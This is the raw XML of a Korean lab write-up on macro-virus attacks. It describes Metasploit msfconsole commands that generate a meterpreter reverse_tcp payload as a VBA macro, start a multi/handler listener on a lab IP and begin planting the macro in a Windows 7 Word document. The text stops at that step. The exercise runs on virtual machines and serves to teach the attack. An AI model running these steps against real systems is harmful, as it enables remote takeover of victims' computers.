          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t>특징</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; 바이러스가 문서파일에 매크로 형태로 삽입되어 공격이 이루어지므로, 탐지가 어려운 특징이 있다. visual basic 등의 프로그래밍 언어로 간단히 스크립트를 작성하여 누구나 공격 코드를 만드는 것이 가능하다. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t>실습 시나리오</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; kali linux의 metasploit을 활용해서 원격으로 서버나 host를 통제할 수 있는 payload를 생성한다. 이때, payload를 macro 형태로 생성하여 생성된 payload를 공격대상 host의 워드 파일에 macro형태로 심어준다. 희생자가 해당 워드 파일을 더블클릭 하는 순간 payload가 실행되어, kali linux에서 희생자 pc를 원격으로 조종이 가능하다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t>실습 환경</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; kali linux(공격자) : Linux kali 5.7.0-kali1-amd64 #1 SMP Debian </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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xml:space="preserve">                                   5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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xml:space="preserve">              윈도우7(희생자) : word 2010 다운로드 (원활한 실습 진행을 위해서 가상으로 윈7과 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                    word2010을 구축한다.)</w:t>
      </w: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tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10686" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="none"/>
          <w:left w:val="none"/>
          <w:bottom w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="none"/>
          <w:insideV w:val="none"/>
        </w:tblBorders>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10686"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="873" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> 공격 실습 결과 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="424" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>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1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> 아래의 명령어를 입력하여 우선 매크로 코드를 생성해 준다. </w:t>
            </w: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hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> --&gt; 첫번째 명령어</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">msf5 &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>use windows/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">msf5 payload(windows/meterpreter/reverse_tcp) &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>set LHOST 192.168.0.156</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>LHOST =&gt; 192.168.0.156</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">msf5 payload(windows/meterpreter/reverse_tcp) &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>set LPORT 4443</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>LPORT =&gt; 4443</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">msf5 payload(windows/meterpreter/reverse_tcp) &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>generate -f vba</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="424" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>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2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> 위의 작업을 끝내주면 아래와 같이 매크로 코드가 작성된 것을 확인할 수 있다. </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4342272" cy="2914218"/>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4342272" cy="2914218"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4362871" cy="2967876"/>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4362871" cy="2967876"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>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3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> payload를 통하여 원격 희생자 호스트와 세션을 맺고, 세션을 핸들링 하기 위하여 세션 핸들러를 작동시켜준다.</w:t>
            </w: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hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> --&gt; 첫번째 명령어</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xml:space="preserve">msf5 &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>use exploit/multi/handler</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Using configured payload generic/shell_reverse_tcp</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xml:space="preserve">msf5 exploit(multi/handler) &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>set payload windows/meterpreter/reverse_tcp</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payload =&gt; windows/meterpreter/reverse_tcp</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xml:space="preserve">msf5 exploit(multi/handler) &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>set LHOST 192.168.0.156</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LHOST =&gt; 192.168.0.156</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xml:space="preserve">msf5 exploit(multi/handler) &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>set LPORT 4443</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LPORT =&gt; 4443</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xml:space="preserve">msf5 exploit(multi/handler) &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>set exitonsession false</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exitonsession =&gt; false</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xml:space="preserve">msf5 exploit(multi/handler) &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>exploit -j</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Exploit running as background job 0.</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Exploit completed, but no session was created.</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xml:space="preserve">[*] Started reverse TCP handler on 192.168.0.156:4443 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>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4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> 아래와 같이 핸들러가 실행되고 있는 것을 확인할 수 있다. </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4533900" cy="3140702"/>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4533900" cy="3140702"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>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5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> 인제 희생자 host에 가서 word 2010으로 새문서를 임의로 작성하여 매크로를 등록하는 작업을 거친다. </w:t>
            </w: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rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" behindDoc="0" locked="0" layoutInCell="1" simplePos="0" relativeHeight="251682816" allowOverlap="1" hidden="0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>4653566</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>432494</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="293511" cy="316091"/>
                      <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1029" name="shape1029" hidden="0"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
